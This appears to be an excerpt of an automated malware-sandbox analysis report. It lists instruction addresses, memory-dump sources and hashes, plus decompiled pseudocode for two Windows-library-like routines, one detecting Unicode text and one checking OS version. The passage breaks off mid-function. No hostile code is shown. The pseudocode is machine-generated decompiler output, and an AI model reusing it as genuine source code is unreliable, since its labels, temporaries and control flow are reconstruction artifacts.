                                                0x00000000
                                                0x00000000
                                                0x00916c31
                                                0x009320e3
                                                0x00000000
                                                0x009320e3
                                                0x00916c41
                                                0x00916c46
                                                0x00916c4b
                                                0x00000000
                                                0x00000000
                                                0x00916c4d
                                                0x00916c5c
                                                0x00916c61
                                                0x00916c66
                                                0x00916c75
                                                0x00916c7b
                                                0x00916c80
                                                0x0095cab7
                                                0x0095cac0
                                                0x0095cac0
                                                0x0095cac3
                                                0x0095cac3
                                                0x0095cacc
                                                0x0095cad1
                                                0x0095cad6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095cadc
                                                0x0095cab9
                                                0x0095cabe
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095cabe
                                                0x00916c80
                                                0x00000000
                                                0x00916c66
                                                0x00916b08
                                                0x00916b0b
                                                0x00916b0f
                                                0x00916b17
                                                0x00916b1c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00916b2c
                                                0x00916b2c
                                                0x00916b30
                                                0x00916b33
                                                0x009320c3
                                                0x009320c8
                                                0x0095ca87
                                                0x0095ca87
                                                0x00916b39
                                                0x00916b39
                                                0x00916b39
                                                0x00916b3c
                                                0x00916b3f
                                                0x00916b41
                                                0x00916b47
                                                0x00916b4d
                                                0x00916b50
                                                0x00916b57
                                                0x00000000
                                                0x00000000
                                                0x00916b5c
                                                0x00916b61
                                                0x00916b6a
                                                0x00916b7b
                                                0x00000000
                                                0x00000000
                                                0x00916b7d
                                                0x00916b8c
                                                0x00916b91
                                                0x00916b96
                                                0x00916ba4
                                                0x00916baa
                                                0x00000000
                                                0x00000000
                                                0x00916bac
                                                0x00916bb9
                                                0x00916bbb
                                                0x00916bc1
                                                0x00000000
                                                0x00000000
                                                0x00916bc6
                                                0x0095ca8f
                                                0x0095ca9a
                                                0x009320d3
                                                0x009320d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009320de
                                                0x00916bcc
                                                0x00916bcc
                                                0x00916bcc
                                                0x00916bcf
                                                0x00916bcf
                                                0x00916bd2
                                                0x00916bd6
                                                0x00916bd7
                                                0x00916bda
                                                0x00916b4d
                                                0x00000000
                                                0x00916b47
                                                0x00916b0f
                                                0x00916adf
                                                0x00916ae2
                                                0x00916ae6
                                                0x0095c985
                                                0x0095c98c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095c992
                                                0x0095c992
                                                0x0095c995
                                                0x0095c99d
                                                0x00000000
                                                0x00000000
                                                0x0095c9a2
                                                0x0095c9a7
                                                0x0095c9b0
                                                0x0095c9b4
                                                0x0095c9b9
                                                0x0095c9bb
                                                0x0095c9bb
                                                0x0095c9bd
                                                0x0095c9ca
                                                0x0095c9cc
                                                0x0095c9db
                                                0x0095c9e0
                                                0x0095c9e5
                                                0x00000000
                                                0x00000000
                                                0x0095c9e5
                                                0x0095c9eb
                                                0x0095c9ef
                                                0x0095c9f2
                                                0x0095c9f8
                                                0x00000000
                                                0x00000000
                                                0x0095c9fe
                                                0x0095c992
                                                0x00000000
                                                0x00931817
                                                0x0093181d
                                                0x00931825
                                                0x00931829
                                                0x0093182c
                                                0x00931833
                                                0x00931836
                                                0x00916c90
                                                0x00916c95
                                                0x00931846
                                                0x00931846
                                                0x00916c9e
                                                0x00916cb0
                                                0x00916cb0
                                                0x00000000
                                                0x00916cb5
                                                0x0093183c
                                                0x00000000
                                                0x0093183c
                                                0x00916aa9

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: 8@8
                                                • API String ID: 0-222468769
                                                • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                • Instruction ID: b799dd2fc35fbcbeea8fd3dba724e73317bf7bc31e1c1ccee32ccabbc736d3e2
                                                • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                                • Instruction Fuzzy Hash: 96F14871E0420DAFDF15CFA4C880BEEBBB8EF45704F10846AE951AB291E375D985CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0092DF7C, Relevance: 1.6, Strings: 1, Instructions: 372COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E0092DF7C(signed short* _a4, signed int _a8, signed int* _a12) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _t205;
				signed int _t206;
				void* _t220;
				signed int _t222;
				signed char _t223;
				signed int _t228;
				unsigned int _t230;
				signed int _t232;
				signed int _t237;
				signed int _t240;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t248;
				signed int _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				signed int* _t258;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed char _t263;
				intOrPtr _t264;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t277;
				signed short _t278;
				signed short* _t281;
				signed int _t293;
				signed int _t295;
				signed int* _t296;
				signed int _t298;
				intOrPtr _t299;
				signed int _t301;
				signed int _t303;
				signed short* _t304;
				signed int _t305;
				void* _t307;

				_t260 = 0;
				_t301 = _a8 >> 1;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v88 = 0;
				_v84 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v36 = 0;
				_v80 = 0;
				_v76 = 0;
				_v92 = 0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v96 = _t301;
				if(_t301 <= 0x100) {
					_v12 = _t301;
					__eflags = _t301;
					if(__eflags != 0) {
						goto L2;
					}
					goto L69;
				} else {
					_v12 = 0x100;
					L2:
					_t307 = _a8 - 2;
					_t281 = _a4;
					if(_t307 == 0) {
						L108:
						__eflags =  *_t281 - _t260;
						if(__eflags == 0) {
							L5:
							if(_v12 <= _t260) {
								_t295 = _a8;
								_t262 = _a8;
								L26:
								if(_t262 == 0xd) {
									__eflags = _v20 - 0xa;
									if(_v20 == 0xa) {
										L76:
										_v16 = _v16 + 1;
										L28:
										if(_t295 == _t260) {
											_v36 = _v36 - 1;
										}
										if(_t295 == 0x1a) {
											_v16 = _v16 + 1;
										}
										_t263 = _a8;
										_v12 = 0x200;
										if(_t263 <= 0x200) {
											_v12 = _t263;
										}
										_t264 =  *0x9d0003; // 0x0
										if(_t264 != 0) {
											_t205 = 0;
											__eflags = _v12 - _t260;
											if(_v12 <= _t260) {
												goto L32;
											} else {
												goto L114;
											}
											while(1) {
												L114:
												_t303 =  *(_t281 + _t205) & 0x000000ff;
												_t299 =  *0x8ffa08; // 0x9d4b20
												__eflags =  *((intOrPtr*)(_t299 + _t303 * 2)) - _t260;
												if( *((intOrPtr*)(_t299 + _t303 * 2)) != _t260) {
													_v32 = _v32 + 1;
													_t205 = _t205 + 1;
													__eflags = _t205;
												}
												_t205 = _t205 + 1;
												__eflags = _t205 - _v12;
												if(_t205 >= _v12) {
													goto L32;
												}
											}
											goto L32;
										} else {
											L32:
											if(_v24 < 0x7f) {
												__eflags = _v28 - _t260;
												if(_v28 != _t260) {
													L34:
													if(_v24 == _t260) {
														_v8 = _v8 | 0x00000010;
													}
													L35:
													_t296 = _a12;
													if(_t264 != 0) {
														__eflags = _v32 - _t260;
														if(_v32 == _t260) {
															goto L36;
														}
														__eflags = _t296 - _t260;
														if(_t296 == _t260) {
															goto L36;
														}
														__eflags =  *_t296 & 0x00000400;
														if(( *_t296 & 0x00000400) == 0) {
															goto L36;
														}
														_t230 = _v96;
														_t261 = 0x100;
														__eflags = _t230 - 0x100;
														if(_t230 > 0x100) {
															_t230 = 0x100;
														}
														_t273 = (_t230 >> 1) - 1;
														_t298 = 3;
														_t232 = _t273;
														_push(_t298);
														__eflags = _v32 - _t232 / _t298;
														if(_v32 >= _t232 / _t298) {
															_pop(_t274);
															__eflags = _v32 - (_t273 + _t273) / _t274;
															_t277 = (0 | _v32 - (_t273 + _t273) / _t274 > 0x00000000) + 1;
															__eflags = _t277;
															_t206 = _t277;
														} else {
															_pop(_t206);
														}
														_v8 = _v8 | 0x00000400;
														_t296 = _a12;
														L37:
														if(_t206 * _v28 < _v24) {
															_v8 = _v8 | 0x00000002;
														}
														if(_t206 * _v24 < _v28) {
															_v8 = _v8 | 0x00000020;
														}
														if(_v40 + _v44 + _v48 + _v52 + _v56 != 0) {
															_v8 = _v8 | 0x00000004;
														}
														if(_v60 + _v64 + _v68 + _v72 != 0) {
															_v8 = _v8 | 0x00000040;
														}
														_t220 = _v76 + _v80 + _v84 + _v88;
														if(_t220 == 0) {
															__eflags = _v16 - _t220;
															if(_v16 == _t220) {
																goto L43;
															}
															_t228 = _v12;
															_t272 = 0x28;
															__eflags = _v16 - _t228 / _t272;
															if(_v16 >= _t228 / _t272) {
																goto L42;
															}
															goto L43;
														} else {
															L42:
															_v8 = _v8 | _t261;
															L43:
															if((_a8 & 0x00000001) != 0) {
																_v8 = _v8 | 0x00000200;
															}
															if(_v36 != 0) {
																_v8 = _v8 | 0x00001000;
															}
															_t222 =  *_a4 & 0x0000ffff;
															if(_t222 == 0xfeff) {
																_v8 = _v8 | 0x00000008;
															} else {
																if(_t222 == 0xfffe) {
																	_v8 = _v8 | 0x00000080;
																}
															}
															if(_t296 != 0) {
																 *_t296 =  *_t296 & _v8;
																_v8 =  *_t296;
															}
															_t223 = _v8;
															if((_t223 & 0x00000008) != 0) {
																__eflags = _t223 & 0x00000b00;
																if((_t223 & 0x00000b00) != 0) {
																	goto L50;
																}
																goto L91;
															} else {
																L50:
																if((_t223 & 0x000000f0) != 0 || (_t223 & 0x00000f00) != 0) {
																	L52:
																	return 0;
																} else {
																	__eflags = _t223 & 0x0000f000;
																	if((_t223 & 0x0000f000) != 0) {
																		L91:
																		return 1;
																	}
																	__eflags = _t223 & 0x0000000f;
																	if((_t223 & 0x0000000f) != 0) {
																		goto L91;
																	} else {
																		goto L52;
																	}
																	goto L108;
																}
															}
														}
													}
													L36:
													_t206 = 3;
													_t261 = 0x100;
													goto L37;
												}
												_v8 = 1;
											}
											if(_v28 == _t260) {
												goto L35;
											}
											goto L34;
										}
									}
								}
								if(_t262 == 0xa) {
									__eflags = _v20 - 0xd;
									if(_v20 != 0xd) {
										goto L28;
									}
									goto L76;
								}
								goto L28;
							} else {
								goto L6;
							}
							L14:
							_t295 = _t278 >> 0x00000008 & 0x000000ff;
							_t262 =  *_t304 & 0x000000ff;
							if(_t262 == 0xd) {
								__eflags = _v20 - 0xa;
								if(__eflags != 0) {
									goto L15;
								} else {
									L63:
									_v16 = _v16 + 1;
									L16:
									_t305 = _v20;
									_v36 = (0 | _t295 == 0x00000000) + _v36 + (0 | _t262 == 0x00000000);
									_t240 = _t295;
									if(_t295 <= _t305) {
										_t240 = _t305;
									}
									if(_t305 >= _t295) {
										_t305 = _t295;
									}
									_t293 = _v92;
									_v28 = _v28 + _t240 - _t305;
									_t242 = _t262;
									if(_t262 <= _t293) {
										_t242 = _t293;
									}
									if(_t293 >= _t262) {
										_t293 = _t262;
									}
									_v24 = _v24 + _t242 - _t293;
									_t260 = _t260 + 1;
									_v92 = _t262;
									_v20 = _t295;
									if(_t260 < _v12) {
										L6:
										_t304 =  &(_a4[_t260]);
										_t278 =  *_t304 & 0x0000ffff;
										_t237 = _t278 & 0x0000ffff;
										if(_t237 <= 0xd00) {
											if(__eflags == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t237 - 0x20;
												if(__eflags <= 0) {
													if(__eflags == 0) {
														_v44 = _v44 + 1;
													} else {
														_t244 = _t237;
														__eflags = _t244;
														if(__eflags == 0) {
															_v80 = _v80 + 1;
														} else {
															_t245 = _t244 - 9;
															__eflags = _t245;
															if(__eflags == 0) {
																_v48 = _v48 + 1;
															} else {
																_t246 = _t245 - 1;
																__eflags = _t246;
																if(__eflags == 0) {
																	_v52 = _v52 + 1;
																} else {
																	__eflags = _t246 - 3;
																	if(__eflags == 0) {
																		_v56 = _v56 + 1;
																	}
																}
															}
														}
													}
												} else {
													_t248 = _t237 - 0x900;
													__eflags = _t248;
													if(__eflags == 0) {
														_v64 = _v64 + 1;
													} else {
														_t249 = _t248 - 0x100;
														__eflags = _t249;
														if(__eflags == 0) {
															_v68 = _v68 + 1;
														} else {
															__eflags = _t249 - 0xd;
															if(__eflags == 0) {
																_v76 = _v76 + 1;
															}
														}
													}
												}
											}
										} else {
											_t251 = _t237 - 0x2000;
											if(_t251 == 0) {
												_v60 = _v60 + 1;
											} else {
												_t252 = _t251 - 0x28;
												if(_t252 != 0) {
													_t253 = _t252 - 1;
													if(_t253 != 0) {
														_t254 = _t253 - 0xfd7;
														if(_t254 == 0) {
															_v40 = _v40 + 1;
														} else {
															_t255 = _t254 - 0xceff;
															if(_t255 != 0) {
																_t256 = _t255 - 0xff;
																if(_t256 == 0) {
																	_v84 = _v84 + 1;
																} else {
																	if(_t256 == 1) {
																		_v88 = _v88 + 1;
																	}
																}
															}
														}
													}
												}
											}
										}
										goto L14;
									} else {
										_t281 = _a4;
										_t260 = 0;
										goto L26;
									}
								}
							}
							L15:
							if(_t262 == 0xa) {
								__eflags = _v20 - 0xd;
								if(__eflags != 0) {
									goto L16;
								}
								goto L63;
							}
							goto L16;
						}
						__eflags = _t281[0] - _t260;
						if(_t281[0] == _t260) {
							L69:
							_t258 = _a12;
							__eflags = _t258 - _t260;
							if(_t258 != _t260) {
								 *_t258 = 5;
							}
							goto L52;
						}
						__eflags = _a8 - 2;
					}
					if(_t307 > 0 && _t301 <= 0x100) {
						__eflags = _a8 & 0x00000001;
						if(__eflags == 0) {
							__eflags =  *(_t281 + _v12 * 2 - 2) & 0x0000ff00;
							if(__eflags == 0) {
								_v12 = _v12 - 1;
							}
						}
					}
					goto L5;
				}
			}






































































                                                0x0092df85
                                                0x0092df8b
                                                0x0092df92
                                                0x0092df95
                                                0x0092df98
                                                0x0092df9b
                                                0x0092df9e
                                                0x0092dfa1
                                                0x0092dfa4
                                                0x0092dfa7
                                                0x0092dfaa
                                                0x0092dfad
                                                0x0092dfb0
                                                0x0092dfb3
                                                0x0092dfb6
                                                0x0092dfb9
                                                0x0092dfbc
                                                0x0092dfbf
                                                0x0092dfc2
                                                0x0092dfc5
                                                0x0092dfc8
                                                0x0092dfcb
                                                0x0092dfce
                                                0x0092dfd1
                                                0x0092dfd6
                                                0x0093ffa4
                                                0x0093ffa7
                                                0x0093ffa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092dfdc
                                                0x0092dfdc
                                                0x0092dfdf
                                                0x0092dfdf
                                                0x0092dfe3
                                                0x0092dfe6
                                                0x0094894c
                                                0x0094894c
                                                0x0094894f
                                                0x0092dff6
                                                0x0092dffa
                                                0x00944504
                                                0x00944507
                                                0x0092e0c2
                                                0x0092e0c5
                                                0x0093fd6f
                                                0x0093fd73
                                                0x0093fffc
                                                0x0093fffc
                                                0x0092e0d4
                                                0x0092e0d6
                                                0x00940053
                                                0x00940053
                                                0x0092e0df
                                                0x0095b278
                                                0x0095b278
                                                0x0092e0e5
                                                0x0092e0ed
                                                0x0092e0f2
                                                0x0093ffea
                                                0x0093ffea
                                                0x0092e0f8
                                                0x0092e100
                                                0x0095b280
                                                0x0095b282
                                                0x0095b285
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b28b
                                                0x0095b28b
                                                0x0095b28b
                                                0x0095b28f
                                                0x0095b295
                                                0x0095b299
                                                0x0095b29b
                                                0x0095b29e
                                                0x0095b29e
                                                0x0095b29e
                                                0x0095b29f
                                                0x0095b2a0
                                                0x0095b2a3
                                                0x00000000
                                                0x00000000
                                                0x0095b2a9
                                                0x00000000
                                                0x0092e106
                                                0x0092e106
                                                0x0092e10a
                                                0x0095b2ab
                                                0x0095b2ae
                                                0x0092e115
                                                0x0092e118
                                                0x0095b2c0
                                                0x0095b2c0
                                                0x0092e11e
                                                0x0092e11e
                                                0x0092e123
                                                0x0095b2c9
                                                0x0095b2cc
                                                0x00000000
                                                0x00000000
                                                0x0095b2d2
                                                0x0095b2d4
                                                0x00000000
                                                0x00000000
                                                0x0095b2df
                                                0x0095b2e1
                                                0x00000000
                                                0x00000000
                                                0x0095b2e7
                                                0x0095b2ea
                                                0x0095b2ef
                                                0x0095b2f1
                                                0x0095b2f3
                                                0x0095b2f3
                                                0x0095b2f7
                                                0x0095b2fe
                                                0x0095b2ff
                                                0x0095b303
                                                0x0095b304
                                                0x0095b307
                                                0x0095b311
                                                0x0095b316
                                                0x0095b31c
                                                0x0095b31c
                                                0x0095b31d
                                                0x0095b309
                                                0x0095b309
                                                0x0095b309
                                                0x0095b31f
                                                0x0095b322
                                                0x0092e131
                                                0x0092e13a
                                                0x00940063
                                                0x00940063
                                                0x0092e147
                                                0x0095b32a
                                                0x0095b32a
                                                0x0092e15e
                                                0x0094004a
                                                0x0094004a
                                                0x0092e172
                                                0x0095b333
                                                0x0095b333
                                                0x0092e183
                                                0x0092e186
                                                0x00940078
                                                0x0094007b
                                                0x00000000
                                                0x00000000
                                                0x00940081
                                                0x00940088
                                                0x0094008b
                                                0x0094008e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092e18c
                                                0x0092e18c
                                                0x0092e18c
                                                0x0092e18f
                                                0x0092e193
                                                0x0092e24a
                                                0x0092e24a
                                                0x0092e19d
                                                0x0094006c
                                                0x0094006c
                                                0x0092e1a6
                                                0x0092e1b1
                                                0x009400a0
                                                0x0092e1b7
                                                0x0092e1bf
                                                0x0095b33c
                                                0x0095b33c
                                                0x0092e1bf
                                                0x0092e1c7
                                                0x0092e1cc
                                                0x0092e1d0
                                                0x0092e1d0
                                                0x0092e1d3
                                                0x0092e1d9
                                                0x009400a9
                                                0x009400ae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092e1df
                                                0x0092e1df
                                                0x0092e1e1
                                                0x0092e1ee
                                                0x00000000
                                                0x00947ad0
                                                0x00947ad0
                                                0x00947ad5
                                                0x00940099
                                                0x00000000
                                                0x00940099
                                                0x0094450f
                                                0x00944511
                                                0x00000000
                                                0x00944517
                                                0x00000000
                                                0x00944517
                                                0x00000000
                                                0x00944511
                                                0x0092e1e1
                                                0x0092e1d9
                                                0x0092e186
                                                0x0092e129
                                                0x0092e12b
                                                0x0092e12c
                                                0x00000000
                                                0x0092e12c
                                                0x0095b2b4
                                                0x0095b2b4
                                                0x0092e113
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092e113
                                                0x0092e100
                                                0x0093fd79
                                                0x0092e0ce
                                                0x0093fff2
                                                0x0093fff6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0093fff6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092e050
                                                0x0092e053
                                                0x0092e056
                                                0x0092e05c
                                                0x0092e22c
                                                0x0092e230
                                                0x00000000
                                                0x0092e236
                                                0x0092e242
                                                0x0092e242
                                                0x0092e06b
                                                0x0092e06b
                                                0x0092e081
                                                0x0092e084
                                                0x0092e088
                                                0x0092e08a
                                                0x0092e08a
                                                0x0092e08e
                                                0x0092e090
                                                0x0092e090
                                                0x0092e092
                                                0x0092e097
                                                0x0092e09a
                                                0x0092e09e
                                                0x0092e0a0
                                                0x0092e0a0
                                                0x0092e0a4
                                                0x0092e0a6
                                                0x0092e0a6
                                                0x0092e0aa
                                                0x0092e0ad
                                                0x0092e0ae
                                                0x0092e0b1
                                                0x0092e0b7
                                                0x0092e000
                                                0x0092e003
                                                0x0092e006
                                                0x0092e009
                                                0x0092e013
                                                0x0092e1f6
                                                0x009444ec
                                                0x0092e1fc
                                                0x0092e1fc
                                                0x0092e1ff
                                                0x0094001e
                                                0x0093fd7e
                                                0x00940024
                                                0x00940024
                                                0x00940024
                                                0x00940027
                                                0x009444c4
                                                0x0094002d
                                                0x0094002d
                                                0x0094002d
                                                0x00940030
                                                0x009444d4
                                                0x00940036
                                                0x00940036
                                                0x00940036
                                                0x00940037
                                                0x0094005b
                                                0x00940039
                                                0x00940039
                                                0x0094003c
                                                0x00940042
                                                0x00940042
                                                0x0094003c
                                                0x00940037
                                                0x00940030
                                                0x00940027
                                                0x0092e205
                                                0x0092e205
                                                0x0092e205
                                                0x0092e20a
                                                0x009444e4
                                                0x0092e210
                                                0x0092e210
                                                0x0092e210
                                                0x0092e215
                                                0x009444dc
                                                0x0092e21b
                                                0x0092e21b
                                                0x0092e21e
                                                0x0092e224
                                                0x0092e224
                                                0x0092e21e
                                                0x0092e215
                                                0x0092e20a
                                                0x0092e1ff
                                                0x0092e019
                                                0x0092e019
                                                0x0092e01e
                                                0x009444fc
                                                0x0092e024
                                                0x0092e024
                                                0x0092e027
                                                0x0092e029
                                                0x0092e02a
                                                0x0092e02c
                                                0x0092e031
                                                0x009444f4
                                                0x0092e037
                                                0x0092e037
                                                0x0092e03c
                                                0x0092e03e
                                                0x0092e043
                                                0x009444cc
                                                0x0092e049
                                                0x0092e04a
                                                0x0095b270
                                                0x0095b270
                                                0x0092e04a
                                                0x0092e043
                                                0x0092e03c
                                                0x0092e031
                                                0x0092e02a
                                                0x0092e027
                                                0x0092e01e
                                                0x00000000
                                                0x0092e0bd
                                                0x0092e0bd
                                                0x0092e0c0
                                                0x00000000
                                                0x0092e0c0
                                                0x0092e0b7
                                                0x0092e230
                                                0x0092e062
                                                0x0092e065
                                                0x0092e238
                                                0x0092e23c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092e23c
                                                0x00000000
                                                0x0092e065
                                                0x00948955
                                                0x00948958
                                                0x0093ffaf
                                                0x0093ffaf
                                                0x0093ffb2
                                                0x0093ffb4
                                                0x0093ffba
                                                0x0093ffba
                                                0x00000000
                                                0x0093ffb4
                                                0x0094895e
                                                0x0094895e
                                                0x0092dfec
                                                0x0093ffc5
                                                0x0093ffc9
                                                0x0093ffd7
                                                0x0093ffdc
                                                0x0093ffe2
                                                0x0093ffe2
                                                0x0093ffdc
                                                0x0093ffc9
                                                0x00000000
                                                0x0092dfec

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4f73fad4a7184aff1f7c3c3b7a02e5a4361bf13b3ba6e83d0a245777d39c0fa8
                                                • Instruction ID: 79b01b7bb7b298d0451a18ff3ba7f1569feec807427b26cdefef36c29ff3e7e6
                                                • Opcode Fuzzy Hash: 4f73fad4a7184aff1f7c3c3b7a02e5a4361bf13b3ba6e83d0a245777d39c0fa8
                                                • Instruction Fuzzy Hash: DDD17C31D0822ADBDF28CF99E5C4ABDBBB5FB45301F24843AD812A7259C7749E42DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009357C3, Relevance: 1.5, Strings: 1, Instructions: 290COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E009357C3(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed char _v10;
				signed int _v12;
				signed short _v14;
				signed short _v16;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				char _v293;
				signed int _v300;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t112;
				signed short _t120;
				signed int _t123;
				void* _t124;
				void* _t127;
				void* _t130;
				void* _t137;
				signed int _t139;
				void* _t144;
				signed int _t146;
				signed int _t151;
				void* _t154;
				signed int _t159;
				void* _t162;
				signed int _t164;
				void* _t165;
				void* _t170;
				signed int _t171;
				signed int _t172;
				void* _t173;
				void* _t207;
				void* _t212;
				signed int _t215;

				_t207 = __edx;
				_t173 = __ecx;
				_t112 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t112 ^ _t215;
				_t208 = 0;
				_v293 = 0;
				if(_a8 == 0) {
					_t114 = 0xc000000d;
					L14:
					return E008FE1B4(_t114, _t170, _v8 ^ _t215, _t207, _t208, _t212);
				}
				_push(_t212);
				E008FDFC0( &_v292, 0, 0x11c);
				_v292 = 0x11c;
				if(E0090B208(_t173,  &_v292) != 0) {
					L13:
					_pop(_t212);
					goto L14;
				}
				_push(_t170);
				if((_a8 & 0x00000040) != 0) {
					_t120 =  *(_a4 + 0x118) & 0x0000ffff;
					if(_t120 == 0) {
						goto L3;
					}
					_v300 = 0;
					_t172 = _t120 & 0x0000ffff;
					do {
						_t208 = 1 << _v300;
						if((_t172 & 1) != 0) {
							_t164 = _a16 & 0x80000000;
							if(_t164 != 0) {
								_t164 = E009358C4(_a12, _a16, 0x40);
							}
							_t165 = _t164 - 6;
							if(_t165 == 0) {
								if((_t208 & _v12 & 0x0000ffff) == 0) {
									L27:
									_t114 = 0xc0000059;
									goto L12;
								}
							} else {
								if(_t165 != 1) {
									_t114 = 0xc000000d;
									L12:
									_pop(_t170);
									goto L13;
								}
								if((_t208 & _v12 & 0x0000ffff) != 0) {
									_v293 = 1;
								}
							}
						}
						_v300 = _v300 + 1;
					} while (_v300 < 0x10);
					if(E009358C4(_a12, _a16, 0x40) != 7 || _v293 != 0) {
						goto L3;
					} else {
						goto L27;
					}
				}
				L3:
				_t171 = _a16;
				_t208 = 1;
				_v293 = 1;
				if((_a8 & 0x00000002) == 0) {
					L28:
					if((_a8 & 0x00000001) == 0) {
						L31:
						if(_v293 == 0) {
							L8:
							if((_a8 & 0x00000004) != 0) {
								if((_t171 & 0x80000000) != 0) {
									_t123 = E009358C4(_a12, _t171, 4);
								} else {
									_t123 = (_t171 << 0x00000020 | _a12) >> 0x10 & 0x000000ff;
								}
								_t124 = E009358F7(0x80000000, _t123,  *((intOrPtr*)(_a4 + 0xc)), _v280,  &_v293, 0);
								if(_t124 != 0) {
									goto L9;
								}
								goto L27;
							}
							L9:
							if((_a8 & 0x00000008) != 0) {
								_t126 = _t171 & 0x80000000;
								if((_t171 & 0x80000000) != 0) {
									_t126 = E009358C4(_a12, _t171, 8);
								}
								_t127 = E009358F7(0x80000000, _t126,  *((intOrPtr*)(_a4 + 0x10)), _v276,  &_v293, 0);
								if(_t127 != 0) {
									goto L10;
								}
								goto L27;
							}
							L10:
							if((_a8 & 0x00000080) != 0) {
								_t129 = _t171 & 0x80000000;
								if((_t171 & 0x80000000) != 0) {
									_t129 = E009358C4(_a12, _t171, 0x80);
								}
								_t130 = E009358F7(0x80000000, _t129,  *(_a4 + 0x11a) & 0x000000ff, _v10 & 0x000000ff,  &_v293, 0);
								if(_t130 == 0) {
									goto L27;
								}
							}
							_t114 = 0;
							goto L12;
						}
						L55:
						if((_a8 & 0x00000020) == 0) {
							L63:
							if(_v293 == 0) {
								goto L8;
							}
							L64:
							if((_a8 & 0x00000010) == 0) {
								goto L8;
							}
							if(_t208 == 1) {
								_t139 = _t171 & 0x80000000;
								if(_t139 != 0) {
									_t139 = E009358C4(_a12, _t171, 0x10);
								}
								_t208 = _t139;
							}
							_t137 = E009358F7(0x80000000, _t208,  *(_a4 + 0x116) & 0x0000ffff, _v14 & 0x0000ffff,  &_v293, 1);
							if(_t137 != 0) {
								goto L8;
							} else {
								goto L27;
							}
						}
						if(_t208 == 1) {
							_t146 = _t171 & 0x80000000;
							if(_t146 != 0) {
								_t146 = E009358C4(_a12, _t171, 0x20);
							}
							_t208 = _t146;
						}
						_t144 = E009358F7(0x80000000, _t208,  *(_a4 + 0x114) & 0x0000ffff, _v16 & 0x0000ffff,  &_v293, 0);
						if(_t144 != 0) {
							goto L63;
						} else {
							if(_v293 == _t144) {
								goto L27;
							}
							goto L64;
						}
					}
					if(_t208 == 1) {
						if((_t171 & 0x80000000) == 0) {
							_t151 = (_t171 << 0x00000020 | _a12) >> 0x2 & 0x000000ff;
